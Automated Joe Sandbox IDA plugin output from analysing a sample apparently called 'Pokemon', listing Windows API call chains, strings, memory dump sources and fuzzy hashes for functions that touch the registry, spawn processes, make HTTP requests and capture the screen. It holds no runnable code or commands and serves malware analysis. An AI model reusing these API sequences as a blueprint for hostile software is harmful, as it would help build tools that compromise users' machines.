                                                                                                                                                                                                                                                                                        • Part of subcall function 000B045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,000D2733,000000FF), ref: 000B04A8
                                                                                                                                                                                                                                                                                        • Part of subcall function 000B045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 000B04BE
                                                                                                                                                                                                                                                                                        • Part of subcall function 000B045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 000B04CC
                                                                                                                                                                                                                                                                                        • Part of subcall function 000B045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 000B04DA
                                                                                                                                                                                                                                                                                        • Part of subcall function 000B045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 000B0505
                                                                                                                                                                                                                                                                                        • Part of subcall function 000B045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 000B0510
                                                                                                                                                                                                                                                                                      • ___scrt_fastfail.LIBCMT ref: 000B0457
                                                                                                                                                                                                                                                                                        • Part of subcall function 000B0413: __onexit.LIBCMT ref: 000B0419
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 000B0492
                                                                                                                                                                                                                                                                                      • kernel32.dll, xrefs: 000B04A3
                                                                                                                                                                                                                                                                                      • SleepConditionVariableCS, xrefs: 000B04C4
                                                                                                                                                                                                                                                                                      • WakeAllConditionVariable, xrefs: 000B04D2
                                                                                                                                                                                                                                                                                      • InitializeConditionVariable, xrefs: 000B04B8
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                                                                                                                                      • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                                                                      • API String ID: 66158676-1714406822
                                                                                                                                                                                                                                                                                      • Opcode ID: 8fa5477ad7dca929f6fcce620843a567e115289de90181917ede8479f7cb8dae
                                                                                                                                                                                                                                                                                      • Instruction ID: 1a873dda3c38b9d27367153f058f14701b2d35e61445360bb99eeed56f7de354
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8fa5477ad7dca929f6fcce620843a567e115289de90181917ede8479f7cb8dae
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0321D872A447147BD7716BA4FC06BEB37D4EB08BA2F144125F905A7E90DFB09C818A51
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _wcslen
                                                                                                                                                                                                                                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                                                                                                                                      • API String ID: 176396367-1603158881
                                                                                                                                                                                                                                                                                      • Opcode ID: 67c69bff5491d5b2ebfc89172383e4b86c31c729d705e031f3808caac123e7a2
                                                                                                                                                                                                                                                                                      • Instruction ID: 071e5b7ae385e3b8dfc02d2d3669ee59218eb26bb651ebeb09d96787517ee7be
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 67c69bff5491d5b2ebfc89172383e4b86c31c729d705e031f3808caac123e7a2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26E1F331A0051ADBCB649FB4C8516FDFBB0BF44720F504129EA56F7681DB30AE89A7D0
APIs
• CharLowerBuffW.USER32(00000000,00000000,0012DCD0), ref: 00104F6C
• _wcslen.LIBCMT ref: 00104F80
• _wcslen.LIBCMT ref: 00104FDE
• _wcslen.LIBCMT ref: 00105039
• _wcslen.LIBCMT ref: 00105084
• _wcslen.LIBCMT ref: 001050EC
  • Part of subcall function 000AFD52: _wcslen.LIBCMT ref: 000AFD5D
• GetDriveTypeW.KERNEL32(?,00157C10,00000061), ref: 00105188
Memory Dump Source
• Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
Similarity
• API ID: _wcslen$BuffCharDriveLowerType
• String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
APIs
• _wcslen.LIBCMT ref: 0011BBF8
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0011BC10
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0011BC34
• _wcslen.LIBCMT ref: 0011BC60
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0011BC74
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0011BC96
• _wcslen.LIBCMT ref: 0011BD92
  • Part of subcall function 00100F4E: GetStdHandle.KERNEL32(000000F6), ref: 00100F6D
• _wcslen.LIBCMT ref: 0011BDAB
• _wcslen.LIBCMT ref: 0011BDC6
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0011BE16
• GetLastError.KERNEL32(00000000), ref: 0011BE67
• CloseHandle.KERNEL32(?), ref: 0011BE99
• CloseHandle.KERNEL32(00000000), ref: 0011BEAA
• CloseHandle.KERNEL32(00000000), ref: 0011BEBC
• CloseHandle.KERNEL32(00000000), ref: 0011BECE
• CloseHandle.KERNEL32(?), ref: 0011BF43
Similarity
• API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,0012DCD0), ref: 00114B18
• GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00114B2A
• GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,0012DCD0), ref: 00114B4F
• FreeLibrary.KERNEL32(00000000,?,0012DCD0), ref: 00114B9B
• StringFromGUID2.OLE32(?,?,00000028,?,0012DCD0), ref: 00114C05
• SysFreeString.OLEAUT32(00000009), ref: 00114CBF
• QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00114D25
• SysFreeString.OLEAUT32(?), ref: 00114D4F
Similarity
• API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
• String ID: GetModuleHandleExW$kernel32.dll
APIs
• GetMenuItemCount.USER32(001629C0), ref: 000D3F72
• GetMenuItemCount.USER32(001629C0), ref: 000D4022
• GetCursorPos.USER32(?), ref: 000D4066
• SetForegroundWindow.USER32(00000000), ref: 000D406F
• TrackPopupMenuEx.USER32(001629C0,00000000,?,00000000,00000000,00000000), ref: 000D4082
• PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 000D408E
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                                                      • API String ID: 36266755-4108050209
                                                                                                                                                                                                                                                                                      • Opcode ID: b8ad6b1f3a78a0883cb4a72675cb4cac437dd83ee7ec746476056c059dea9828
                                                                                                                                                                                                                                                                                      • Instruction ID: 4cc824b2b701e05b6fdc24bc98f96e33f81fe94b6be59be18e39dee09125dac1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b8ad6b1f3a78a0883cb4a72675cb4cac437dd83ee7ec746476056c059dea9828
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1571E631A44319BFEB319F29DC49FAABFA5FF04364F200216F614A62D1C7B19960DB61
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • DestroyWindow.USER32(00000000,?), ref: 00127823
                                                                                                                                                                                                                                                                                        • Part of subcall function 00098577: _wcslen.LIBCMT ref: 0009858A
                                                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00127897
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 001278B9
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001278CC
                                                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 001278ED
                                                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00090000,00000000), ref: 0012791C
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00127935
                                                                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 0012794E
                                                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 00127955
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0012796D
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00127985
                                                                                                                                                                                                                                                                                        • Part of subcall function 00092234: GetWindowLongW.USER32(?,000000EB), ref: 00092242
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                                                                                                                                                      • String ID: 0$tooltips_class32
                                                                                                                                                                                                                                                                                      • API String ID: 2429346358-3619404913
                                                                                                                                                                                                                                                                                      • Opcode ID: 6e5fb9d1b3ce6bdbe2067c7753a2769d324b827ec77a0f14ec3a97e654d707db
                                                                                                                                                                                                                                                                                      • Instruction ID: 1663e55754da0835e6da079edd73735c6f46a7b7410743bd3a47f7ea6459fccc
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e5fb9d1b3ce6bdbe2067c7753a2769d324b827ec77a0f14ec3a97e654d707db
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04717870105354AFDB25CF18EC48F6BBBF9EB89318F04441DF985872A1C770A9A6DB11
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009249F: GetWindowLongW.USER32(00000000,000000EB), ref: 000924B0
                                                                                                                                                                                                                                                                                      • DragQueryPoint.SHELL32(?,?), ref: 00129BA3
                                                                                                                                                                                                                                                                                        • Part of subcall function 001280AE: ClientToScreen.USER32(?,?), ref: 001280D4
                                                                                                                                                                                                                                                                                        • Part of subcall function 001280AE: GetWindowRect.USER32(?,?), ref: 0012814A
                                                                                                                                                                                                                                                                                        • Part of subcall function 001280AE: PtInRect.USER32(?,?,?), ref: 0012815A
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00129C0C
                                                                                                                                                                                                                                                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00129C17
                                                                                                                                                                                                                                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00129C3A
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00129C81
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00129C9A
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00129CB1
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00129CD3
                                                                                                                                                                                                                                                                                      • DragFinish.SHELL32(?), ref: 00129CDA
                                                                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00129DCD
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                                                                                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                                                                                                                                      • API String ID: 221274066-3440237614
                                                                                                                                                                                                                                                                                      • Opcode ID: f5f0550aa6c55fe97dd1f5236e0bac2198e0f26c7ef73eb544e6b85ba7adb5a8
                                                                                                                                                                                                                                                                                      • Instruction ID: b67e99abf0fbee32b43dea367bd2701a6a41bfcec139dcbdf01eb571b0c50f58
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f5f0550aa6c55fe97dd1f5236e0bac2198e0f26c7ef73eb544e6b85ba7adb5a8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 72617971108345AFC701EF64EC85DAFBBE8EF88750F40092EF595921A1DB70AA59CB52
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0010CEF5
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0010CF08
                                                                                                                                                                                                                                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0010CF1C
                                                                                                                                                                                                                                                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0010CF35
                                                                                                                                                                                                                                                                                      • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0010CF78
                                                                                                                                                                                                                                                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0010CF8E
                                                                                                                                                                                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0010CF99
                                                                                                                                                                                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0010CFC9
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0010D021
                                                                                                                                                                                                                                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0010D035
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0010D040
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3800310941-3916222277
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,001266D6,?,?), ref: 00128FEE
                                                                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,001266D6,?,?,00000000,?), ref: 00128FFE
                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,001266D6,?,?,00000000,?), ref: 00129009
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,001266D6,?,?,00000000,?), ref: 00129016
                                                                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00129024
                                                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,001266D6,?,?,00000000,?), ref: 00129033
                                                                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0012903C
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,001266D6,?,?,00000000,?), ref: 00129043
                                                                                                                                                                                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,001266D6,?,?,00000000,?), ref: 00129054
                                                                                                                                                                                                                                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00130C04,?), ref: 0012906D
                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 0012907D
                                                                                                                                                                                                                                                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 0012909D
                                                                                                                                                                                                                                                                                      • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 001290CD
                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 001290F5
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0012910B
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3840717409-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009B329: _wcslen.LIBCMT ref: 0009B333
                                                                                                                                                                                                                                                                                        • Part of subcall function 0011D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0011C10E,?,?), ref: 0011D415
                                                                                                                                                                                                                                                                                        • Part of subcall function 0011D3F8: _wcslen.LIBCMT ref: 0011D451
                                                                                                                                                                                                                                                                                        • Part of subcall function 0011D3F8: _wcslen.LIBCMT ref: 0011D4C8
                                                                                                                                                                                                                                                                                        • Part of subcall function 0011D3F8: _wcslen.LIBCMT ref: 0011D4FE
                                                                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0011C154
                                                                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0011C1D2
                                                                                                                                                                                                                                                                                      • RegDeleteValueW.ADVAPI32(?,?), ref: 0011C26A
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0011C2DE
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0011C2FC
                                                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0011C352
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0011C364
                                                                                                                                                                                                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 0011C382
                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 0011C3E3
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0011C3F4
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                                                                                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                                      • API String ID: 146587525-4033151799
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00113035
                                                                                                                                                                                                                                                                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00113045
                                                                                                                                                                                                                                                                                      • CreateCompatibleDC.GDI32(?), ref: 00113051
                                                                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 0011305E
                                                                                                                                                                                                                                                                                      • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 001130CA
                                                                                                                                                                                                                                                                                      • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00113109
                                                                                                                                                                                                                                                                                      • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 0011312D
                                                                                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00113135
                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0011313E
                                                                                                                                                                                                                                                                                      • DeleteDC.GDI32(?), ref: 00113145
                                                                                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,?), ref: 00113150
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                                                                                                                      • String ID: (
                                                                                                                                                                                                                                                                                      • API String ID: 2598888154-3887548279
                                                                                                                                                                                                                                                                                      • Opcode ID: fbbbdeaafb3a1083310cf49a0ef14ac889ea649c57e7f20c1661bea5c9bcd74c
                                                                                                                                                                                                                                                                                      • Instruction ID: f00cfd6368665b950744cdd12646d0f98c2bcd8bbef9462716e560d87d8a4a53
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fbbbdeaafb3a1083310cf49a0ef14ac889ea649c57e7f20c1661bea5c9bcd74c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA61E2B5D00219AFCB18CFA8D884EEEBBF5FF48310F208529E559A7650D771A991CF90
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009249F: GetWindowLongW.USER32(00000000,000000EB), ref: 000924B0
                                                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 0012A990
                                                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000011), ref: 0012A9A7
                                                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 0012A9B3
                                                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 0012A9C9
                                                                                                                                                                                                                                                                                      • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 0012AC15
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0012AC33
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0012AC54
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000003,00000000), ref: 0012AC73
                                                                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0012AC95
                                                                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000005,?), ref: 0012ACBB
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
